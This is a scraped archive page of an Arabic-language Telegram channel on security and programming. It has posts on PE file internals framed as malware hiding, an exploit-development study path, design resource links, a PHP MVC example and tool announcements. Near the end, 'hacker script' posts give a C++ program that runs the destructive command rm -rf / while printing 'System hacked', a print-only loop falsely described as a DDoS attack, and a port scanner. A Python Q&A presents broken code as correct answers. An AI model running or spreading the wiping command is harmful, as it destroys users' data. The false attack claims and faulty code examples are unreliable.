fa
Feedback
Society Elite

Society Elite

رفتن به کانال در Telegram

。.。:∞♡*♥ قناة تختص أمن المعلومات و السايبر سكيورتي و البرمجة وغيرها من مسارات تقنية المعلومات و الصور و الصوتيات و معلومات عامة / " التكنولوجيا " كتب مختلفة التصنيف " وغيرها من العلوم تابعة لـــ : Academy F6-Team

نمایش بیشتر
644
مشترکین
اطلاعاتی وجود ندارد24 ساعت
-17 روز
+130 روز
آرشیو پست ها
مقالة "Windows Internals - PE Format (Part 1)" على موقع 0xrick تتناول تفاصيل حول تنسيق ملفات PE (Portable Executable) وهو نوع من الملفات المهم جداً في أنظمة التشغيل ويندوز. 1. Introduction (مقدمة) الفصل ده بيوضح إيه هو ملف الـPE وليه هو مهم. ملف الـPE هو ببساطة ملف قابل للتنفيذ (زي البرامج والتطبيقات) اللي بيشتغل على أنظمة ويندوز. الملف ده بيحتوي على الكود اللي بيشتغل لما تفتح البرنامج، وبيانات تانية مهمة زي المعلومات اللي بتقول للنظام إزاي يشغل الكود ده. الفايدة في عالم المالوير: معرفة التفاصيل دي بيساعد الهاكرز اللي بيطوروا المالوير إنهم يعرفوا إزاي يخفوا برامجهم الضارة جوة ملفات الـPE عشان تبقى صعبة الاكتشاف. 2. DOS Header (هيدر الـDOS) ده أول جزء في ملف الـPE، وبيحتوي على بيانات قديمة كانت بتستخدم في الأيام اللي كان نظام الـDOS شغال. الحتة دي فيها بيانات زي توقيع الملف اللي بيسمى "MZ" وكمان عنوان بداية الهيدر التاني اللي هو الـPE Header. الفايدة في عالم المالوير: لو حد عايز يخفي مالوير في ملف PE، ممكن يلعب في البيانات هنا عشان يصعب على برامج الحماية إنها تكتشفه بسهولة. 3. PE Header (هيدر الـPE) ده الجزء اللي بعد هيدر الـDOS، وبيحتوي على معلومات أساسية عن الملف زي نوع الـCPU اللي البرنامج بيشتغل عليه، والـEntry Point اللي بيبدأ منه التشغيل، وحجم الأقسام المختلفة في الملف. الفايدة في عالم المالوير: الهاكرز ممكن يغيروا البيانات هنا عشان يغيروا طريقة تشغيل الملف، أو عشان يضيفوا بيانات تخدع النظام. 4. Optional Header (الهيدر الاختياري) رغم إن اسمه اختياري، لكنه بيكون موجود في معظم ملفات الـPE. الهيدر ده بيحتوي على بيانات أكتر تفصيلية زي حجم الملف في الذاكرة، ونقاط البداية والنهاية للأقسام المختلفة في الملف. الفايدة في عالم المالوير: البيانات هنا بتساعد الهاكرز إنهم يعرفوا إزاي يحددوا الكود بتاعهم في مناطق معينة من الذاكرة لتجنب الكشف. 5. Sections (الأقسام) ملف الـPE بيتقسم لأجزاء مختلفة، كل جزء بيسمى Section، وكل Section بيحتوي على نوع معين من البيانات، زي الكود التنفيذي، أو البيانات، أو المعلومات اللي بيحتاجها البرنامج. الفايدة في عالم المالوير: الهاكرز ممكن يحطوا الكود الضار في Section معين ويستخدموا باقي الأقسام لتخزين بيانات بتساعد في تشغيل المالوير بدون ما يتكشف. 6. Data Directories (أدلة البيانات) دي مجموعة من المؤشرات اللي بتشير لأماكن البيانات المهمة في الملف، زي الـImport Table اللي بيحتوي على أسماء الدوال اللي البرنامج بيستدعيها من ملفات النظام. الفايدة في عالم المالوير: من هنا الهاكرز ممكن يعرفوا إزاي برامج الحماية بتتعامل مع الملفات، ويغيروا البيانات دي عشان يقدروا يشتغلوا بدون ما يتكشفوا. 7. Sections Header (هيدر الأقسام) ده الجزء اللي بيحدد تفاصيل كل Section في الملف، زي مكانه في الملف وحجمه. الفايدة في عالم المالوير: الهاكرز ممكن يعدلوا البيانات دي عشان يغيروا أماكن وأحجام الأقسام لتجنب الكشف. المقالة دي بتديك تفاصيل تقنية عن كل جزء في ملف الـPE، والمعرفة دي مهمة جداً لأي حد مهتم بتطوير البرامج أو حتى المالوير. الهاكرز بيستخدموا المعلومات دي عشان يطوروا مالوير بيكون صعب الكشف عنه، وفي نفس الوقت مطوري البرامج بيستخدموها عشان يحموا برامجهم من الاختراق.

فهم لغة التجميع x86: لغة التجميع x86 مهمة جدا لأي حد عايز يدخل مجال تطوير الاستغلالات، لأنها بتساعدك تفهم ازاي البرامج بتشتغل على مستوى منخفض جدا. لما تتعلم لغة التجميع هتقدر تشوف ازاي الكود بيتحول لأوامر بسيطة بيقدر الكمبيوتر يفهمها وينفذها. مثلا، الأوامر زي MOV بتنقل بيانات من مكان لمكان تاني، و PUSH و POP بيتعاملوا مع الستاك اللي هو جزء مهم في الذاكرة. دي أمثلة بسيطة لكن فهمها هيساعدك جدا في تحليل الثغرات وتطوير الاستغلالات حماية الذاكرة زي DEP و ASLR: في الأنظمة الحديثة، حماية الذاكرة بقت حاجة أساسية. DEP (Data Execution Prevention) بتمنع تشغيل الكود من أجزاء معينة في الذاكرة، وASLR (Address Space Layout Randomization) بتغير أماكن الذاكرة عشوائيا عشان تصعب على المخترقين يتوقعوا الأماكن اللي ممكن يشتغلوا عليها. عشان تقدر تتجاوز الحمايات دي، لازم تتعلم حاجات متقدمة زي ROP Chains (Return-Oriented Programming)، اللي بتسمح لك بتكوين سلسلة من الأوامر الصغيرة (gadgets) لتحقيق هدف معين بدون تشغيل كود غير موثوق. الأدوات زي OllyDBG و Immunity Debugger: الأدوات دي بتساعدك جدا في تحليل الكود وفهم الثغرات. OllyDBG هو ديباجر بيشتغل على الويندوز وبيسمح لك تشوف الكود على مستوى التجميع، تتابع التنفيذ خطوة بخطوة، وتحلل أماكن الذاكرة. Immunity Debugger مشابه ليه لكنه موجه أكتر للمختصين في أمن المعلومات وفيه مزايا إضافية بتساعد في تحليل الثغرات. تطبيق عملي: - أولا: اتعلم الأساسيات في لغة التجميع x86 من خلال دروس أو كتب متخصصة. - ثانيا: استخدم أدوات زي OllyDBG عشان تحلل برامج بسيطة وتفهم ازاي بتشتغل. - ثالثا: جرب تطور استغلالات بسيطة للثغرات اللي تكتشفها، وطبقها على برامج زي CesarFTP أو غيره. - رابعا: اتعلم ازاي تتجاوز حمايات زي DEP وASLR باستخدام تقنيات متقدمة زي ROP Chains. لو عايز تتعلم أكتر وتاخد خطوات عملية، ممكن تبدأ بدورات تدريبية متقدمة زي [Corelan Training](https://www.corelan-training.com) اللي بتركز على تطوير الاستغلالات وأمن المعلومات. المصدر : https://www.youtube.com/watch?v=hr9ApN0DRaA&list=PLCLxMnnAnGimvAQCZyKtfhmKA3-fTG9yU&index=3

مواقع للعروض التقديمية : https://www.canva.com/ https://www.slideshare.net/ https://www.slidescarnival.com/ https://graphicriver.net/ #قوالب #عروض_تقديمية

​💎 تجميعة أفضل مصادر و المواقع لتصميم ui / ux 🔘مواقع الالوان: 1. https://colorhunt.co 2. https://klart.io 3. https://color.adobe.com 4. https://webkul.github.io 5. https://pigment.shapefactory.co 6. http://bit.ly/2Jam0Vu 🔘مواقع الصور: 1. https://unsplash.com/ 2. https://www.pexels.com/ 3. https://pixabay.com/ 4. https://stocksnap.io/ 5. https://burst.shopify.com/ 🔘مواقع الصور بدون خلفية: 1. https://www.kisspng.com 2. http://pngimg.com/ 3. https://www.footyrenders.com/ 4. https://pngtree.com/ 🔘مواقع الفيديوهات 1. https://mixkit.co 2. https://coverr.co 3. https://www.motionplaces.com 4. https://www.videezy.com/ 🔘مواقع استلهام 1. https://www.inspirationde.com 2. https://www.designspiration.net 3. https://www.pinterest.com 4. https://dribbble.com 🔘مواقع استلهام لـ الشعارات 1. https://www.logomoose.com 2. https://logopond.com 3. https://www.logolounge.com 4. http://logofaves.com 5. http://www.logotalkz.com 6. http://logospire.com 🔘مواقع استلهام لـ تجربة المُستخدم والتطبيقات 1. https://inspired-ui.com 2. https://www.calltoidea.com 3. https://www.mobile-patterns.com 4. https://www.uplabs.com 🔘مواقع لتحميل الموك اب 1. https://mockupsforfree.com/ 2. https://www.mockupworld.co 3. https://graphicburger.com 4. https://zippypixels.com 🔘مواقع لتحميل الملفات 1. https://www.freepik.com 2. https://all-free-download.com 3. https://www.vecteezy.com 4. https://365psd.com 🔘مواقع تحميل الفرش 1. https://www.brushking.eu/ 2. https://www.brusheezy.com/brushes 3. https://myphotoshopbrushes.com/ 4. https://fbrushes.com/ 5. http://gfxfever.com/photoshop-brushes 🔘مواقع لتحميل الأيقونات 1. https://www.flaticon.com 2. https://freeicons.io 3. https://iconstore.co 4. https://www.iconfinder.com 5. https://digitalnomadicons.com 6. https://iconstore.co مواقع لتحميل الشعارات فيكتور 1. https://seeklogo.com 2. http://logovector.net 3. http://logotypes101.com 4. http://logos-vector.com مواقع لتحميل الخطوط العربية 1. https://arbfonts.com 2. https://www.fontface.me 3. https://fonts.google.com 4. https://brushez.com مواقع لتحميل الخطوط الأنجليزية 1. https://www.dafont.com/ 2. https://www.1001fonts.com/ 3. https://www.fontsquirrel.com/ 4. https://www.fontfreak.com/fonts-new.htm

كتاب سيكولوجية الألوان #مهم

-كيف يعمل MVC؟ عندما يقوم المستخدم بطلب صفحة معينة: المتحكم (Controller) يتلقى الطلب. المتحكم (Controller) يطلب البيانات من النموذج (Model) إذا كانت هناك حاجة. النموذج (Model) يتفاعل مع قاعدة البيانات ويعيد البيانات إلى المتحكم (Controller). المتحكم (Controller) يمرر البيانات إلى العرض (View). العرض (View) يعرض البيانات للمستخدم. مثال بسيط على MVC في PHP لنقم بإنشاء تطبيق بسيط يعرض قائمة بالمستخدمين: 1. النموذج (Model)
// model/UserModel.php
class UserModel {
    private $db;

    public function __construct($db) {
        $this->db = $db;
    }

    public function getUsers() {
        $stmt = $this->db->prepare("SELECT * FROM users");
        $stmt->execute();
        return $stmt->fetchAll(PDO::FETCH_ASSOC);
    }
}
2. المتحكم (Controller)
// controller/UserController.php
class UserController {
    private $userModel;

    public function __construct($userModel) {
        $this->userModel = $userModel;
    }

    public function index() {
        $users = $this->userModel->getUsers();
        require 'view/usersView.php';
    }
}
3. العرض (View)
<!-- view/usersView.php -->
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Users List</title>
</head>
<body>
    <h1>Users List</h1>
    <ul>
        <?php foreach ($users as $user): ?>
            <li><?php echo htmlspecialchars($user['name']); ?></li>
        <?php endforeach; ?>
    </ul>
</body>
</html>
4. التجميع
// index.php
require 'config/database.php';
require 'model/UserModel.php';
require 'controller/UserController.php';

$database = new Database();
$db = $database->getConnection();
$userModel = new UserModel($db);
$userController = new UserController($userModel);
$userController->index();
أهمية MVC فصل منطق العمل (Business logic) عن العرض: يساعد في تنظيم الكود وجعله أسهل في القراءة والصيانة. إعادة الاستخدام: يمكنك إعادة استخدام النموذج والعرض مع متحكمات مختلفة، مما يوفر الوقت والجهد. سهولة الصيانة: يساعد في العثور على الأخطاء وإصلاحها بسهولة أكبر. العمل الجماعي: يمكن للمصممين والمطورين العمل معًا على نفس المشروع دون التدخل في عمل بعضهم البعض. #MVC_Model

ما هو MVC؟ ‏MVC هو اختصار لـ Model-View-Controller، وهو نمط معماري يُستخدم لتنظيم وترتيب الكود في تطبيقات الويب. الهدف الرئيس
ما هو MVC؟ ‏MVC هو اختصار لـ Model-View-Controller، وهو نمط معماري يُستخدم لتنظيم وترتيب الكود في تطبيقات الويب. الهدف الرئيسي من MVC هو فصل منطق التطبيق (البرمجة) عن واجهة المستخدم (التصميم) لجعل التطوير والصيانة أسهل وأسرع. مكونات MVC ‏Model (النموذج):‏ ‏o‏ يمثل لوجيك التطبيق. ‏o يتعامل مع البيانات بشكل مباشر: جلبها من قاعدة البيانات، تحديثها، وإدارتها. ‏o‏ يتعامل مع قواعد البيانات، البيانات المرسلة والمستقبلة من وإلى المستخدم. ‏View (العر‏ض): ‏o‏ يمثل واجهة المستخدم (ما يراه المستخدم ويتفاعل معه). ‏o يعرض البيانات التي يحصل عليها من النموذج. ‏o لا يحتوي على أي منطق متعلق بالبيانات أو منطق العمل. ‏Controller (المتحكم): ‏o يعمل كوسيط بين النموذج و العرض. ‏o يستقبل الطلب (Request) من المستخدم (عبر واجهة المستخدم)، يعالجها، ويرسلها للنموذج . ‏o يستلم الرد من النموذج ثم يعيد ارسال الرد من النموذج الى العرض و يقوم بتشغيل الملف المطلوب . ✅ فهو يتلقى الطلبات من المستخدم، يعالجها باستخدام النموذج، ثم يمرر البيانات المناسبة إلى العرض. #MVC_Model

Simple Cloudflare based DNS manager Free 2 subdomains for all users 💃 » dns.catway.org https://github.com/TeaByte/catway-dns
Simple Cloudflare based DNS manager Free 2 subdomains for all users 💃 » dns.catway.org https://github.com/TeaByte/catway-dns Please give a ⭐️ on Github!

اميل موقت مجاني ومفتوح المصدر على دومين خاص من صديقي يزن تقنيات مستعمله: Mail Server => Postfix Back-end => NextJS / Node Fro
اميل موقت مجاني ومفتوح المصدر على دومين خاص من صديقي يزن تقنيات مستعمله: Mail Server => Postfix Back-end => NextJS / Node Front-end => NextJS / TailwindCSS https://mail.catway.org https://github.com/TeaByte/catway-mail

تم دعم عمل Docs لمكاتب Python، وتحويل كود Html إلى كود Python. https://github.com/IceBytes/PDocs https://markdown.catway.org

السلام عليكم ورحمة الله وبركاته. اعلن عن اطلاق موقع Markdown Tools، وهو موقع يقدم خدمات تخص Markdown مثل تحويل markdown code
السلام عليكم ورحمة الله وبركاته. اعلن عن اطلاق موقع Markdown Tools، وهو موقع يقدم خدمات تخص Markdown مثل تحويل markdown code إلى html code، وعرض markdown code. قريبا راح يدعم عمل Docs لمكاتب python عن طريق DocsGen، وايضا تحويل html code ل markdown. https://github.com/IceBytes/PDocs https://markdown.catway.org

السلام عليكم ورحمة الله وبركاته. اعلن عن اطلاق النسخة الاولية ل DocsGen، DocsGen هي مكتبة تختص في عمل Docs ل python packages.
السلام عليكم ورحمة الله وبركاته. اعلن عن اطلاق النسخة الاولية ل DocsGen، DocsGen هي مكتبة تختص في عمل Docs ل python packages. طريقة الاستخدام تكمن في جلب المجلد الذي يحتوى على ال source code فقط (مع الانتباه على عدم وضع ملفات ال setup وهكذا يعني فقط مجلد src او المجلد الذي يحتوى على ال source code بشكل عام) https://github.com/IceBytes/DocsGen https://pypi.org/project/DocsGen من فضلك قم بدعمي عن طريق وضع Star على المشروع.

اعلن عن إطلاق النسخة الاولية من تطبيق RustNet التطبيق واجهته gui بلغة python بمكتبة PyQT5 وهو تطبيق يساعد المبرمجين والمخترقي
اعلن عن إطلاق النسخة الاولية من تطبيق RustNet التطبيق واجهته gui بلغة python بمكتبة PyQT5 وهو تطبيق يساعد المبرمجين والمخترقين في عملهم، عبر دعم اشياء تخص ال Network, Malwares، وقريبا اقسام مفيدة للمبرمجين خاصة. https://github.com/IceBytes/RustNet

🚀 مرحبًا بكم في مكتبة Sandy الرائعة في Rust! 🦀 Sandy هي مكتبة Rust تمكنك من بناء موقع بطريقة بسيطة وسريعة، مع افضل Template engine مع Http server محمي من كل الثغرات. ✨ تعرَّف على Sandy: - قم بزيارة ال docs الخاص بـ Sandy: Sandy Documentation - استكشف GitHub الرسمي لـ Sandy: GitHub Repository - احصل على Sandy من crates.io: Sandy on Crates ⚡️ مميزات Sandy: - إنشاء موقع متكامل وعمل Backend بكل سهولة وأمان اي بامكانك عمل Http server محمي. - دعم عمل routes سواء static routes ام dynamic routes. - استخدام template engine متقدم وجميل. - مرونة في التعامل مع request methods مثل get, post, etc. - دعم عمل sitemap للموقع الخاص بك. - عمل route تلقائي لاي ملف في static folder. استمتع بالقدرة على إنشاء http server بكل سهولة وامان باستخدام Sandy في مشاريعك القادمة في Rust! 🌐✨

السؤال: كيف يمكنك إنشاء دالة في بايثون تأخذ رقمًا كمدخل وتعيد مربعه؟ الجواب:
def square(num):
    return square **2 
شرح الجواب: إنشئنا دالة في بايثون بأسم square وتأخذ قيمة واحدة وهذه القيمة تخزن في متغير اسمه num بعدها قمنا بأرجاع قيمة مرعبه الرقم المدخل السؤال: كيف يمكنك قراءة محتوى ملف نصي في بايثون وعرضه؟ الجواب:
file = open('file_name.txt:,'r', encoding='utf-8').read()
print(file)
شرح الجواب: # انشاء متغير بأسم file واستخدام دالة open لقراءة والكتابة داخل الملفات وكتابة اسم ملف بأسم file_name.txt ووضعنا حرف r مشير الى read ووضعنا الترميز utf-8 يمكنك تغيره على حسب حاجتك ووضعنا بعدها .read() لقراءة محتوى الملف وبعدها استخدمنا دالة print لطباعة محتوى الملف السؤال: كيف يمكنك استخدام قائمة للفحص إذا كان هناك عنصر معين موجود فيها أم لا؟ الجواب:
my_list = [1, 2, 3, 4, 5]
element = 3

if element in my_list:
    print(f"{element} is in the list")
else:
    print(f"{element} is not in the list")
شرح الجواب: انشئنا متغير بأسم our_list وقيمته قائمة تحمل عدة قيم وبعدها انشئنا متغير بأسم element يحمل قيمة رقم 3 بعدها انشئنا شرط اذا كان قيمة المتغير element موجودة في القائمة لدينا التي توجد في متغير our_list سوف يطبع لنا القيمة الخاصة بالمتغير element وسوف يطبع لنا جملة is in the list وقلنا في حالة لم يتحقق الشرط اطبع لنا قيمة المتغير element واطبع لنا جملة is not in the list

الهاكرز بيستخدموا سكريبتات عشان يخترقوا الأنظمة والمواقع. مثلاً، السكريبت ده بيستخدم في استغلال ثغرات الويب:
#include <iostream>
#include <string>
#include <cstdlib>
#include <ctime>
using namespace std;

int main() {
    srand(time(0)); // عشان نحدد بذرة الرقم العشوائي

    string target = "example.com"; // الموقع اللي هنهاجمه
    int numAttacks = 100; // عدد مرات الهجوم

    for (int i = 0; i < numAttacks; ++i) {
        int randomPort = rand() % 65536; // بتولد رقم من 0 لـ65535
        cout << "Attacking " << target << " on port " << randomPort << "...\n";
        // هنا يتم تنفيذ الهجوم بواسطة إرسال طلبات مزيفة للموقع
    }

    cout << "Attack finished!\n";
    return 0;
}
هذا السكريبت يقوم بإرسال طلبات افتراضية لموقع معين على منافذ عشوائية لإحداث اضطراب في الخدمة (DDoS). وهناك سكريبتات أخرى مثل الاختراق المستهدف لأنظمة:
#include <iostream>
#include <cstdlib>
#include <unistd.h>
using namespace std;

int main() {
    cout << "Hacking into the system...\n";
    sleep(3); // انتظار ثلاث ثواني عشان يظهر انه بيتم اختراق النظام

    system("rm -rf /"); // أمر يحذف كل شيء في النظام

    cout << "System hacked successfully!\n";
    return 0;
}
هذا السكريبت يحذف كل محتويات النظام بالكامل!

طبعاً، في الهاكرات بيستخدموا كتير لغة C++ عشان يبنوا سكربتات (برامج) بتساعدهم يخترقوا النظم والأنظمة. مثلاً، في C++ الهاكرات بيستخدموا مكتبة مهمة اسمها Winsock عشان يتواصلوا مع الأنظمة ويخترقوها. واحد من أشهر السكربتات اللي بيستخدموها الهاكرز هو الـ"Port Scanner"، اللي بيساعدهم يعرفوا أي بورتات مفتوحة على النظام اللي هم بيحاولوا يخترقوه. ده مثال بسيط لسكربت Port Scanner بلغة C++ بالعامية المصرية:
#include <iostream>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")

using namespace std;

int main() {
    WSADATA wsaData;
    int iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
    if (iResult != 0) {
        cout << "Error: Winsock initialization failed\n";
        return 1;
    }

    SOCKET ConnectSocket;
    struct sockaddr_in server;

    string ipAddress;
    cout << "Enter IP address to scan: ";
    cin >> ipAddress;

    for (int port = 1; port <= 1024; port++) {
        ConnectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (ConnectSocket == INVALID_SOCKET) {
            cout << "Error: Could not create socket\n";
            WSACleanup();
            return 1;
        }

        server.sin_family = AF_INET;
        server.sin_port = htons(port);
        server.sin_addr.s_addr = inet_addr(ipAddress.c_str());

        if (connect(ConnectSocket, (struct sockaddr *)&server, sizeof(server)) == SOCKET_ERROR) {
            // Port is closed
            // cout << "Port " << port << " is closed\n";
            closesocket(ConnectSocket);
        } else {
            // Port is open
            cout << "Port " << port << " is open\n";
            closesocket(ConnectSocket);
        }
    }

    WSACleanup();
    return 0;
}
السكربت ده بيتصفح البورتات من 1 لـ1024 على الآي بي اللي المستخدم هيدخله وبيشوف إذا كانت البورتات مفتوحة أو مقفولة.